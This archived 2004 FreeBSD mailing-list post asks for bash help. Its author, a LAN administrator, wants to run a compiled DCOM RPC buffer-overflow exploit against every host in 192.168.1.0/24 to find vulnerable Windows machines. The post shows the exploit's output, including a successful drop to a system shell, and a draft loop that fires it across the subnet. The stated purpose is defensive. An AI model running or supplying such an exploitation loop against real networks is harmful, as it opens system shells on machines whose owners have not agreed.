From owner-freebsd-questions@FreeBSD.ORG Mon Mar 15 15:41:51 2004 Return-Path: Delivered-To: freebsd-questions@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3E73516A4CE for ; Mon, 15 Mar 2004 15:41:51 -0800 (PST) Received: from tequila.4you.lt (tequila.4you.lt [212.122.68.216]) by mx1.FreeBSD.org (Postfix) with SMTP id 9CC9243D2D for ; Mon, 15 Mar 2004 15:41:47 -0800 (PST) (envelope-from hugle@vkt.lt) Received: (qmail 60177 invoked by uid 0); 15 Mar 2004 23:42:58 -0000 Received: from hugle@vkt.lt by tequila by uid 82 with qmail-scanner-1.20rc1 (. Clear:RC:1:. Processed in 0.01092 secs); 15 Mar 2004 23:42:58 -0000 Received: from unknown (HELO vkt-dell) (213.252.192.162) by tequila.4you.lt with SMTP; 15 Mar 2004 23:42:58 -0000 Date: Tue, 16 Mar 2004 01:40:51 +0200 From: hugle X-Mailer: The Bat! (v2.01) X-Priority: 3 (Normal) Message-ID: <130471393648.20040316014051@vkt.lt> To: freebsd-questions@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Subject: Need bash help X-BeenThere: freebsd-questions@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list Reply-To: hugle List-Id: User questions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 15 Mar 2004 23:41:51 -0000 Hello all. I'm writing here, cause i think just here people can help me. (p.s. didn't find bash mailing lists) So here's what I'm palnning to do.. I have big LAN in here, and noticed that lots of users are still exploitable using RPC. I've just found source of this exploit, compiled it, and tried to use - it works. What i'm planning to is automaticaly detect such users (exploitable). So i run : ftp# ./dc IP and get: --------------------------------------------------------- - Remote DCOM RPC Buffer Overflow Exploit - Original code by FlashSky and Benjurry - Rewritten by HDM - Using return address of 0x77e626ba - Dropping to System Shell... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> END. So if there is text like '- Dropping to System Shell...' means that system is vulderable. otherways it teturns: --------------------------------------------------------- - Remote DCOM RPC Buffer Overflow Exploit - Original code by FlashSky and Benjurry - Rewritten by HDM - Using return address of 0x77e626ba - Exploit appeared to have failed. So what I wanna do is smth like: for i in `seq 1 254`; do ./dc 192.168.1.$i and if it returns 'Dropping to system shell' then add these IP to vulderable_users done After i'm planning to block those users on my router, and forward them to the webpage with explanation on howto FIX that bug. Thanks for help in advance Jarek